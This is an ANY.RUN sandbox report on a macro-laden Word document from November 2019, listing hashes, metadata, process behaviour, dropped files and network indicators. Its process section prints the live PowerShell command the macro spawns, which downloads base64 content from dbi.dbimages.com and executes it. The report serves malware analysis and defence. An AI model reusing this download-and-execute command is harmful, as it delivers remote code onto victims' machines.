analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

98979312240860638782354.doc

Full analysis: https://app.any.run/tasks/a46aa5e3-3d36-4d79-9b1c-0800703b4511
Verdict: Malicious activity
Analysis date: November 08, 2019, 14:41:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 22, Name of Creating Application: Microsoft Office Word, Total Editing Time: 31:00, Create Time/Date: Sun Nov 3 21:31:00 2019, Last Saved Time/Date: Sun Nov 3 22:02:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

48204732E5ABFB24C3E7DB1BFAD80E74

SHA1:

15CE3861912599D57E0C1C9254485BA972DAB179

SHA256:

F341A9252405D87C3A90E544D7607CBEF5C0BFDDE4FBAFA6BA02750310E930B2

SSDEEP:

6144:uNgZ6nCvWsrxfK6bPMybqtSgy/W45Oz6SxKV:RGyWmxvMybqtJKV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2588)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2588)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1936)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2588)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2588)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:11:03 22:02:00
CreateDate: 2019:11:03 21:31:00
TotalEditTime: 31.0 minutes
Software: Microsoft Office Word
RevisionNumber: 22
LastModifiedBy: Administrator
Template: Normal.dotm
Comments: -
Keywords: -
Author: Administrator
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2588"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\98979312240860638782354.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1936"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ( [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( ((New-Object Net.WebClient).DownloadString('http://dbi.dbimages.com/?need=negato0&vid=dpec22&42686')) ) ) );C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 800
Read events
1 065
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2588WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAE6B.tmp.cvr
MD5:
SHA256:
1936powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YVFRI8KFMW3UFZWQAX5B.temp
MD5:
SHA256:
1936powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b9d5.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2588WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$979312240860638782354.docpgc
MD5:BE8B7F118D808085E398A1757421FB1B
SHA256:45C3BF6A1EF9400780BBF9A8CEC743E0CEF5C0D0835EBCDF0770F09E14EB6808
2588WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F7B77449B13C2BEE090561117118F356
SHA256:2367F2C9A271FFC240C0817994A811161A810518A6CA41026F0675C02A285AA9
1936powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1936
powershell.exe
GET
185.158.249.113:80
http://dbi.dbimages.com/?need=negato0&vid=dpec22&42686
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.158.249.113:80
dbi.dbimages.com
easystores GmbH
NL
malicious

DNS requests

Domain
IP
Reputation
dbi.dbimages.com
  • 185.158.249.113
malicious

Threats

No threats detected
No debug info